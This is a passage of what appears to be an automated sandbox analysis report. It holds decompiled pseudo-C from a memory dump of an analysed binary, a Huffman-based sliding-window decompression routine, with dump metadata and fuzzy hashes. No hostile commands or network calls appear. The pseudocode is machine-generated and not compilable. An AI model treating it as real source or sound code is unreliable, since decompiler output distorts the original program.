                																	L154:
                																	__eflags = _t632 - 8;
                																	if(_t632 < 8) {
                																		goto L117;
                																	}
                																	L155:
                																	_t347 = _t632 >> 3;
                																	__eflags = _t347;
                																	 *(_t658 + 0x30) = _t347;
                																	_t639 = _t347;
                																	do {
                																		L156:
                																		E00CBEA80(_t646, _t468, 8);
                																		_t658 = _t658 + 0xc;
                																		_t468 = _t468 + 8;
                																		_t646 = _t646 + 8;
                																		_t632 = _t632 - 8;
                																		_t639 = _t639 - 1;
                																		__eflags = _t639;
                																	} while (_t639 != 0);
                																	goto L116;
                																}
                																L150:
                																_t611 = 8;
                																__eflags = _t632 - _t611;
                																if(_t632 < _t611) {
                																	goto L117;
                																}
                																L151:
                																_t511 = _t632 >> 3;
                																__eflags = _t511;
                																do {
                																	L152:
                																	_t632 = _t632 - _t611;
                																	 *_t646 =  *_t468;
                																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
                																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
                																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
                																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
                																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
                																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
                																	_t356 =  *((intOrPtr*)(_t468 + 7));
                																	_t468 = _t468 + _t611;
                																	 *((char*)(_t646 + 7)) = _t356;
                																	_t646 = _t646 + _t611;
                																	_t511 = _t511 - 1;
                																	__eflags = _t511;
                																} while (_t511 != 0);
                																goto L117;
                															} else {
                																L146:
                																_push( *(_t638 + 0xe6dc));
                																_push(_t638 + 0x7c);
                																_push(_t608);
                																L71:
                																_push(_t632);
                																E00CB20EE();
                																goto L0;
                																do {
                																	while(1) {
                																		L0:
                																		_t638 = __esi;
                																		_t598 = __esi + 0x7c;
                																		do {
                																			while(1) {
                																				L1:
                																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
                																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
                																					goto L12;
                																				} else {
                																					_t637 = _t638 + 0x8c;
                																				}
                																				goto L3;
                																			}
                																			goto L103;
                																		} while (_t632 == 0);
                																		__eflags =  *((char*)(_t638 + 0x4c44));
                																		if( *((char*)(_t638 + 0x4c44)) == 0) {
                																			L106:
                																			_t537 =  *(_t638 + 0x7c);
                																			_t614 =  *(_t638 + 0x60);
                																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
                																			_t468 = _t537 - _t614;
                																			__eflags = _t468 - _t399;
                																			if(_t468 >= _t399) {
                																				L125:
                																				__eflags = _t632;
                																				if(_t632 == 0) {
                																					while(1) {
                																						L0:
                																						_t638 = __esi;
                																						_t598 = __esi + 0x7c;
                																						L1:
                																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
                																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
                																							goto L12;
                																						} else {
                																							_t637 = _t638 + 0x8c;
                																						}
                																					}
                																				}
                																				L126:
                																				_t648 =  *(_t638 + 0xe6dc);
                																				do {
                																					L127:
                																					_t649 = _t648 & _t468;
                																					_t468 = _t468 + 1;
                																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
                																					_t598 = _t638 + 0x7c;
                																					_t648 =  *(_t638 + 0xe6dc);
                																					 *_t598 =  *_t598 + 0x00000001 & _t648;
                																					_t632 = _t632 - 1;
                																					__eflags = _t632;
                																				} while (_t632 != 0);
                																				L161:
                																				_t643 = _t638 + 4;
                																				goto L1;
                																			}
                																			L107:
                																			__eflags = _t537 - _t399;
                																			if(_t537 >= _t399) {
                																				goto L125;
                																			}
                																			L108:
                																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
                																			_t468 = _t468 + _t400;
                																			_t646 = _t400 + _t537;
                																			 *(_t638 + 0x7c) = _t537 + _t632;
                																			__eflags = _t614 - _t632;
                																			if(_t614 >= _t632) {
                																				L113:
                																				__eflags = _t632 - 8;
                																				if(_t632 < 8) {
                																					L117:
                																					_t598 = _t638 + 0x7c;
                																					__eflags = _t632;
                																					if(_t632 == 0) {
                																						goto L161;
                																					}
                																					L118:
                																					_t598 = _t638 + 0x7c;
                																					 *_t646 =  *_t468;
                																					__eflags = _t632 - 1;
                																					if(_t632 <= 1) {
                																						goto L161;
                																					}
                																					L119:
                																					_t598 = _t638 + 0x7c;
                																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
                																					__eflags = _t632 - 2;
                																					if(_t632 <= 2) {
                																						goto L161;
                																					}
                																					L120:
                																					_t598 = _t638 + 0x7c;
                																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
                																					__eflags = _t632 - 3;
                																					if(_t632 <= 3) {
                																						goto L161;
                																					}
                																					L121:
                																					_t598 = _t638 + 0x7c;
                																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
                																					__eflags = _t632 - 4;
                																					if(_t632 <= 4) {
                																						goto L161;
                																					}
                																					L122:
                																					_t598 = _t638 + 0x7c;
                																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
                																					__eflags = _t632 - 5;
                																					if(_t632 <= 5) {
                																						goto L161;
                																					}
                																					L123:
                																					_t598 = _t638 + 0x7c;
                																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
                																					__eflags = _t632 - 6;
                																					if(_t632 <= 6) {
                																						goto L161;
                																					}
                																					L124:
                																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
                																					while(1) {
                																						L0:
                																						_t638 = __esi;
                																						_t598 = __esi + 0x7c;
                																						goto L1;
                																					}
                																				}
                																				L114:
                																				_t403 = _t632 >> 3;
                																				__eflags = _t403;
                																				 *(_t658 + 0x30) = _t403;
                																				_t641 = _t403;
                																				do {
                																					L115:
                																					E00CBEA80(_t646, _t468, 8);
                																					_t658 = _t658 + 0xc;
                																					_t468 = _t468 + 8;
                																					_t646 = _t646 + 8;
                																					_t632 = _t632 - 8;
                																					_t641 = _t641 - 1;
                																					__eflags = _t641;
                																				} while (_t641 != 0);
                																				L116:
                																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
                																				goto L117;
                																			}
                																			L109:
                																			_t615 = 8;
                																			__eflags = _t632 - _t615;
                																			if(_t632 < _t615) {
                																				goto L117;
                																			}
                																			L110:
                																			_t539 = _t632 >> 3;
                																			__eflags = _t539;
                																			do {
                																				L111:
                																				_t632 = _t632 - _t615;
                																				 *_t646 =  *_t468;
                																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
                																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
                																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
                																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
                																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
                																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
                																				_t412 =  *((intOrPtr*)(_t468 + 7));
                																				_t468 = _t468 + _t615;
                																				 *((char*)(_t646 + 7)) = _t412;
                																				_t646 = _t646 + _t615;
                																				_t539 = _t539 - 1;
                																				__eflags = _t539;
                																			} while (_t539 != 0);
                																			goto L117;
                																		}
                																		L105:
                																		_push( *(_t638 + 0xe6dc));
                																		_push(_t638 + 0x7c);
                																		_push( *(_t638 + 0x60));
                																		goto L71;
                																	}
                																	L98:
                																	_t417 = E00CB1A0E(_t638, _t658 + 0x1c);
                																	__eflags = _t417;
                																} while (_t417 != 0);
                																goto L99;
                															}
                														}
                														L134:
                														_t531 = _t638 + (_t322 + 0xb5a) * 4;
                														while(1) {
                															L135:
                															__eflags = _t605 -  *_t531;
                															if(_t605 <  *_t531) {
                																break;
                															}
                															L136:
                															_t322 = _t322 + 1;
                															_t531 = _t531 + 4;
                															__eflags = _t322 - 0xf;
                															if(_t322 < 0xf) {
                																continue;
                															}
                															L137:
                															goto L139;
                														}
                														L138:
                														_t628 = _t322;
                														goto L139;
                													}
                													L132:
                													_t532 = 0x10;
                													_t613 = _t605 >> _t532 - _t321;
                													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
                													 *_t643 =  *_t643 + (_t535 >> 3);
                													 *(_t643 + 4) = _t535 & 0x00000007;
                													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
                													goto L140;
                												} else {
                													goto L130;
                												}
                												do {
                													L130:
                													 *_t493 =  *(_t493 - 4);
                													_t493 = _t493 - 4;
                													_t461 = _t461 - 1;
                													__eflags = _t461;
                												} while (_t461 != 0);
                												goto L131;
                											}
                											L103:
                											_t632 =  *(_t638 + 0x74);
                											_t598 = _t638 + 0x7c;
                											__eflags = _t632;
                										}
                										L97:
                										_push(_t658 + 0x1c);
                										_t414 = E00CB3564(_t638, _t643);
                										__eflags = _t414;
                										if(_t414 == 0) {
                											goto L99;
                										}
                										goto L98;
                									}
                									L32:
                									_t634 = _t460 - 0x106;
                									__eflags = _t634 - 8;
                									if(_t634 >= 8) {
                										_t478 = (_t634 >> 2) - 1;
                										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
                										__eflags = _t634;
                									} else {
                										_t478 = 0;
                									}
                									_t632 = _t634 + 2;
                									__eflags = _t478;
                									if(_t478 != 0) {
                										_t444 = E00CAA4ED(_t643);
                										_t582 = 0x10;
                										_t632 = _t632 + (_t444 >> _t582 - _t478);
                										_t585 =  *(_t643 + 4) + _t478;
                										 *_t643 =  *_t643 + (_t585 >> 3);
                										_t586 = _t585 & 0x00000007;
                										__eflags = _t586;
                										 *(_t643 + 4) = _t586;
                									}
                									_t418 = E00CAA4ED(_t643);
                									_t419 =  *(_t638 + 0x1010);
                									_t617 = _t418 & 0x0000fffe;
                									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
                									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
                										L39:
                										_t479 = 0xf;
                										_t420 = _t419 + 1;
                										__eflags = _t420 - _t479;
                										if(_t420 >= _t479) {
                											L45:
                											_t546 =  *(_t643 + 4) + _t479;
                											 *(_t643 + 4) = _t546 & 0x00000007;
                											_t422 = _t546 >> 3;
                											 *_t643 =  *_t643 + _t422;
                											_t548 = 0x10;
                											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
                											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
                											asm("sbb eax, eax");
                											_t423 = _t422 & _t551;
                											__eflags = _t423;
                											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
                											goto L46;
                										}
                										L40:
                										_t575 = _t638 + (_t420 + 0x3e4) * 4;
                										while(1) {
                											L41:
                											__eflags = _t617 -  *_t575;
                											if(_t617 <  *_t575) {
                												break;
                											}
                											L42:
                											_t420 = _t420 + 1;
                											_t575 = _t575 + 4;
                											__eflags = _t420 - 0xf;
                											if(_t420 < 0xf) {
                												continue;
                											}
                											L43:
                											goto L45;
                										}
                										L44:
                										_t479 = _t420;
                										goto L45;
                									} else {
                										L38:
                										_t576 = 0x10;
                										_t625 = _t617 >> _t576 - _t419;
                										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
                										 *_t643 =  *_t643 + (_t579 >> 3);
                										 *(_t643 + 4) = _t579 & 0x00000007;
                										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
                										L46:
                										_t425 = _t424 & 0x0000ffff;
                										__eflags = _t425 - 4;
                										if(_t425 >= 4) {
                											_t643 = (_t425 >> 1) - 1;
                											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
                											__eflags = _t425;
                										} else {
                											_t643 = 0;
                										}
                										_t428 = _t425 + 1;
                										 *(_t658 + 0x14) = _t428;
                										_t471 = _t428;
                										 *(_t658 + 0x30) = _t471;
                										__eflags = _t643;
                										if(_t643 == 0) {
                											L64:
                											_t643 = _t638 + 4;
                											goto L65;
                										} else {
                											L50:
                											__eflags = _t643 - 4;
                											if(__eflags < 0) {
                												L72:
                												_t359 = E00CB7D76(_t638 + 4);
                												_t514 = 0x20;
                												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
                												_t517 =  *(_t638 + 8) + _t643;
                												 *(_t658 + 0x30) = _t471;
                												_t643 = _t638 + 4;
                												 *_t643 =  *_t643 + (_t517 >> 3);
                												 *(_t643 + 4) = _t517 & 0x00000007;
                												L65:
                												__eflags = _t471 - 0x100;
                												if(_t471 > 0x100) {
                													_t632 = _t632 + 1;
                													__eflags = _t471 - 0x2000;
                													if(_t471 > 0x2000) {
                														_t632 = _t632 + 1;
                														__eflags = _t471 - 0x40000;
                														if(_t471 > 0x40000) {
                															_t632 = _t632 + 1;
                															__eflags = _t632;
                														}
                													}
                												}
                												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
                												 *(_t638 + 0x68) =  *(_t638 + 0x64);
                												 *(_t638 + 0x64) =  *(_t638 + 0x60);
                												 *(_t638 + 0x60) = _t471;
                												__eflags =  *((char*)(_t638 + 0x4c44));
                												 *(_t638 + 0x74) = _t632;
                												if( *((char*)(_t638 + 0x4c44)) == 0) {
                													L73:
                													_t598 = _t638 + 0x7c;
                													_t519 =  *_t598;
                													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
                													_t651 = _t519 - _t471;
                													__eflags = _t651 - _t366;
                													if(_t651 >= _t366) {
                														L92:
                														__eflags = _t632;
                														if(_t632 == 0) {
                															goto L161;
                														}
                														L93:
                														_t472 =  *(_t638 + 0xe6dc);
                														do {
                															L94:
                															_t473 = _t472 & _t651;
                															_t651 = _t651 + 1;
                															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
                															_t598 = _t638 + 0x7c;
                															_t472 =  *(_t638 + 0xe6dc);
                															 *_t598 =  *_t598 + 0x00000001 & _t472;
                															_t632 = _t632 - 1;
                															__eflags = _t632;
                														} while (_t632 != 0);
                														goto L161;
                													}
                													L74:
                													__eflags = _t519 - _t366;
                													if(_t519 >= _t366) {
                														goto L92;
                													}
                													L75:
                													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
                													_t474 = _t371 + _t651;
                													_t652 = _t371 + _t519;
                													 *_t598 = _t519 + _t632;
                													__eflags =  *(_t658 + 0x30) - _t632;
                													if( *(_t658 + 0x30) >= _t632) {
                														L80:
                														__eflags = _t632 - 8;
                														if(_t632 < 8) {
                															L84:
                															__eflags = _t632;
                															if(_t632 != 0) {
                																 *_t652 =  *_t474;
                																__eflags = _t632 - 1;
                																if(_t632 > 1) {
                																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
                																	__eflags = _t632 - 2;
                																	if(_t632 > 2) {
                																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
                																		__eflags = _t632 - 3;
                																		if(_t632 > 3) {
                																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
                																			__eflags = _t632 - 4;
                																			if(_t632 > 4) {
                																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
                																				__eflags = _t632 - 5;
                																				if(_t632 > 5) {
                																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
                																					__eflags = _t632 - 6;
                																					if(_t632 > 6) {
                																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
                																					}
                																				}
                																			}
                																		}
                																	}
                																}
                															}
                															goto L161;
                														}
                														L81:
                														_t381 = _t632 >> 3;
                														__eflags = _t381;
                														 *(_t658 + 0x30) = _t381;
                														_t640 = _t381;
                														do {
                															L82:
                															E00CBEA80(_t652, _t474, 8);
                															_t658 = _t658 + 0xc;
                															_t474 = _t474 + 8;
                															_t652 = _t652 + 8;
                															_t632 = _t632 - 8;
                															_t640 = _t640 - 1;
                															__eflags = _t640;
                														} while (_t640 != 0);
                														_t638 =  *((intOrPtr*)(_t658 + 0x10));
                														_t598 =  *(_t658 + 0x18);
                														goto L84;
                													}
                													L76:
                													__eflags = _t632 - 8;
                													if(_t632 < 8) {
                														goto L84;
                													}
                													L77:
                													_t522 = _t632 >> 3;
                													__eflags = _t522;
                													do {
                														L78:
                														_t632 = _t632 - 8;
                														 *_t652 =  *_t474;
                														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
                														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
                														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
                														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
                														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
                														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
                														_t390 =  *((intOrPtr*)(_t474 + 7));
                														_t474 = _t474 + 8;
                														 *((char*)(_t652 + 7)) = _t390;
                														_t652 = _t652 + 8;
                														_t522 = _t522 - 1;
                														__eflags = _t522;
                													} while (_t522 != 0);
                													goto L84;
                												} else {
                													L70:
                													_push( *(_t638 + 0xe6dc));
                													_push(_t638 + 0x7c);
                													_push(_t471);
                													goto L71;
                												}
                											}
                											L51:
                											if(__eflags <= 0) {
                												_t656 = _t638 + 4;
                											} else {
                												_t439 = E00CB7D76(_t638 + 4);
                												_t569 = 0x24;
                												_t572 = _t643 - 4 +  *(_t638 + 8);
                												_t656 = _t638 + 4;
                												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
                												 *_t656 =  *_t656 + (_t572 >> 3);
                												 *(_t656 + 4) = _t572 & 0x00000007;
                											}
                											_t429 = E00CAA4ED(_t656);
                											_t430 =  *(_t638 + 0x1efc);
                											_t621 = _t429 & 0x0000fffe;
                											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
                											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
                												L56:
                												_t657 = 0xf;
                												_t431 = _t430 + 1;
                												__eflags = _t431 - _t657;
                												if(_t431 >= _t657) {
                													L62:
                													_t555 =  *(_t638 + 8) + _t657;
                													 *(_t638 + 8) = _t555 & 0x00000007;
                													_t433 = _t555 >> 3;
                													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
                													_t557 = 0x10;
                													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
                													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
                													asm("sbb eax, eax");
                													_t434 = _t433 & _t560;
                													__eflags = _t434;
                													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
                													goto L63;
                												}
                												L57:
                												_t562 = _t638 + (_t431 + 0x79f) * 4;
                												while(1) {
                													L58:
                													__eflags = _t621 -  *_t562;
                													if(_t621 <  *_t562) {
                														break;
                													}
                													L59:
                													_t431 = _t431 + 1;
                													_t562 = _t562 + 4;
                													__eflags = _t431 - 0xf;
                													if(_t431 < 0xf) {
                														continue;
                													}
                													L60:
                													goto L62;
                												}
                												L61:
                												_t657 = _t431;
                												goto L62;
                											} else {
                												L55:
                												_t563 = 0x10;
                												_t624 = _t621 >> _t563 - _t430;
                												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
                												 *_t656 =  *_t656 + (_t566 >> 3);
                												 *(_t656 + 4) = _t566 & 0x00000007;
                												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
                												L63:
                												_t471 = _t471 + (_t435 & 0x0000ffff);
                												__eflags = _t471;
                												 *(_t658 + 0x30) = _t471;
                												goto L64;
                											}
                										}
                									}
                								}
                								L28:
                								__eflags =  *((char*)(_t638 + 0x4c44));
                								if( *((char*)(_t638 + 0x4c44)) == 0) {
                									L30:
                									_t598 = _t638 + 0x7c;
                									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
                									 *_t598 =  *_t598 + 1;
                									continue;
                								}
                								L29:
                								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
                								 *(E00CB17A5(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
                								goto L0;
                							}
                						}
                						L13:
                						__eflags = _t483 -  *_t598;
                						if(_t483 ==  *_t598) {
                							goto L18;
                						}
                						L14:
                						E00CB47DA(_t638);
                						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
                						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
                						if(__eflags > 0) {
                							goto L100;
                						}
                						L15:
                						if(__eflags < 0) {
                							L17:
                							__eflags =  *((char*)(_t638 + 0x4c50));
                							if( *((char*)(_t638 + 0x4c50)) != 0) {
                								L162:
                								 *((char*)(_t638 + 0x4c60)) = 0;
                								goto L100;
                							}
                							goto L18;
                						}
                						L16:
                						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
                						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
                						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
                							goto L100;
                						}
                						goto L17;
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                • Instruction ID: a209a8b674b29cceb6d55b9f817b0c108de3e1ab2003d5ad7cc5e44a4f384fda
                • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                • Instruction Fuzzy Hash: 73622771604B858FCB29CF78C8907F9BBE1AF95304F08856ED9AA8B346D734EA45D710
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00CB6CDB(void* __ecx) {
                				intOrPtr* _t347;
                				signed int _t351;
                				signed int _t352;
                				signed int _t353;
                				signed int _t355;
                				signed int _t356;
                				signed int _t357;
                				signed int _t358;
                				signed int _t359;
                				signed int _t361;
                				signed int _t362;
                				signed int _t363;
                				void* _t365;
                				intOrPtr _t370;
                				signed int _t380;
                				char _t389;
                				unsigned int _t390;
                				signed int _t397;
                				void* _t399;
                				intOrPtr _t404;
                				signed int _t407;
                				char _t416;
                				signed int _t417;
                				char _t418;
                				signed int _t420;
                				signed int _t421;
                				signed int _t422;
                				signed int _t423;
                				signed int _t425;
                				signed int _t426;
                				signed short _t427;
                				signed int _t430;
                				void* _t435;
                				intOrPtr _t440;
                				signed int _t443;
                				char _t452;
                				unsigned int _t453;
                				signed int _t456;
                				signed int _t457;
                				signed int _t458;
                				signed int _t461;
                				signed int _t462;
                				signed short _t463;
                				unsigned int _t467;
                				unsigned int _t472;
                				intOrPtr _t489;
                				signed int _t490;
                				signed int _t491;
                				signed int _t492;
                				signed int _t493;
                				unsigned int _t496;
                				unsigned int _t498;
                				intOrPtr _t499;
                				signed int _t501;
                				intOrPtr _t505;
                				intOrPtr _t506;
                				intOrPtr _t507;
                				unsigned int _t510;
                				void* _t512;
                				signed int _t515;
                				signed int* _t518;
                				unsigned int _t521;
                				void* _t523;
                				signed int _t526;
                				signed int _t529;
                				intOrPtr _t530;
                				void* _t532;
                				signed int _t535;
                				signed int _t536;
                				intOrPtr* _t538;
                				void* _t539;
                				signed int _t542;
                				intOrPtr _t545;
                				unsigned int _t552;
                				void* _t554;
                				signed int _t557;
                				signed int _t559;
                				signed int _t561;
                				intOrPtr _t563;
                				void* _t565;
                				signed int _t568;
                				signed int _t569;
                				signed int _t571;
                				signed int _t573;
                				void* _t575;
                				signed int _t578;
                				intOrPtr* _t580;
                				void* _t581;
                				signed int _t584;
                				void* _t587;
                				signed int _t590;
                				intOrPtr* _t593;
                				void* _t594;
                				signed int _t597;
                				void* _t600;
                				signed int _t603;
                				intOrPtr* _t607;
                				void* _t608;
                				signed int _t611;
                				signed int _t614;
                				unsigned int _t616;
                				signed int _t619;
                				signed int _t620;
                				unsigned int _t622;
                				signed int _t625;
                				signed int _t628;
                				signed int _t629;
                				signed int _t630;
                				signed int _t633;
                				unsigned int _t635;
                				signed int _t638;
                				signed int _t641;
                				signed int _t644;
                				intOrPtr* _t645;
                				unsigned int _t647;
                				signed int _t650;
                				signed int _t651;
                				signed int _t652;
                				signed int _t653;
                				intOrPtr _t654;
                				signed int _t655;
                				signed int _t656;
                				signed int _t657;
                				signed int _t658;
                				signed int _t659;
                				signed int _t660;
                				signed int _t661;
                				signed int _t662;
                				void* _t663;
                				intOrPtr _t666;
                				intOrPtr* _t667;
                				intOrPtr* _t668;
                				signed int _t671;
                				signed int _t673;
                				intOrPtr* _t675;
                				signed int _t677;
                				signed int _t680;
                				intOrPtr* _t681;
                				signed int _t682;
                				signed int _t683;
                				signed int _t684;
                				signed int _t685;
                				void* _t691;
                
                				_t654 =  *((intOrPtr*)(_t691 + 0x34));
                				_t663 = __ecx;
                				if( *((char*)(_t654 + 0x2c)) != 0) {
                					L3:
                					_t505 =  *((intOrPtr*)(_t654 + 0x18));
                					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
                					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
                						L2:
                						 *((char*)(_t654 + 0x4ad0)) = 1;
                						return 0;
                					} else {
                						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
                						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
                						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
                						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
                						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
                						__eflags = _t666 - _t489;
                						if(_t666 >= _t489) {
                							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
                						}
                						_t347 = _t654 + 4;
                						while(1) {
                							_t614 =  *(_t663 + 0xe6dc);
                							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
                							_t506 =  *_t347;
                							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
                							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
                								goto L16;
                							}
                							L10:
                							__eflags = _t506 - _t666;
                							if(__eflags > 0) {
                								L100:
                								_t418 = 1;
                								L101:
                								return _t418;
                							}
                							if(__eflags != 0) {
                								L13:
                								__eflags = _t506 - _t499;
                								if(_t506 < _t499) {
                									L15:
                									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
                									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
                										L151:
                										 *((char*)(_t654 + 0x4ad3)) = 1;
                										goto L100;
                									}
                									goto L16;
                								}
                								__eflags =  *((char*)(_t654 + 0x4ad2));
                								if( *((char*)(_t654 + 0x4ad2)) == 0) {
                									goto L151;
                								}
                								goto L15;
                							}
                							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
                							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
                								goto L100;
                							}
                							goto L13;
                							L16:
                							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
                							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
                							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
                								L21:
                								_t667 = _t654 + 4;
                								_t351 = E00CAA4ED(_t667);
                								_t352 =  *(_t654 + 0xb4);
                								_t616 = _t351 & 0x0000fffe;
                								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
                								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
                									_t490 = 0xf;
                									_t353 = _t352 + 1;
                									__eflags = _t353 - _t490;
                									if(_t353 >= _t490) {
                										L30:
                										_t510 =  *(_t667 + 4) + _t490;
                										 *(_t667 + 4) = _t510 & 0x00000007;
                										_t355 = _t510 >> 3;
                										 *_t667 =  *_t667 + _t355;
                										_t512 = 0x10;
                										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
                										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
                										asm("sbb eax, eax");
                										_t356 = _t355 & _t515;
                										__eflags = _t356;
                										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
                										_t347 = _t654 + 4;
                										L31:
                										__eflags = _t619 - 0x100;
                										if(_t619 >= 0x100) {
                											__eflags = _t619 - 0x106;
                											if(_t619 < 0x106) {
                												__eflags = _t619 - 0x100;
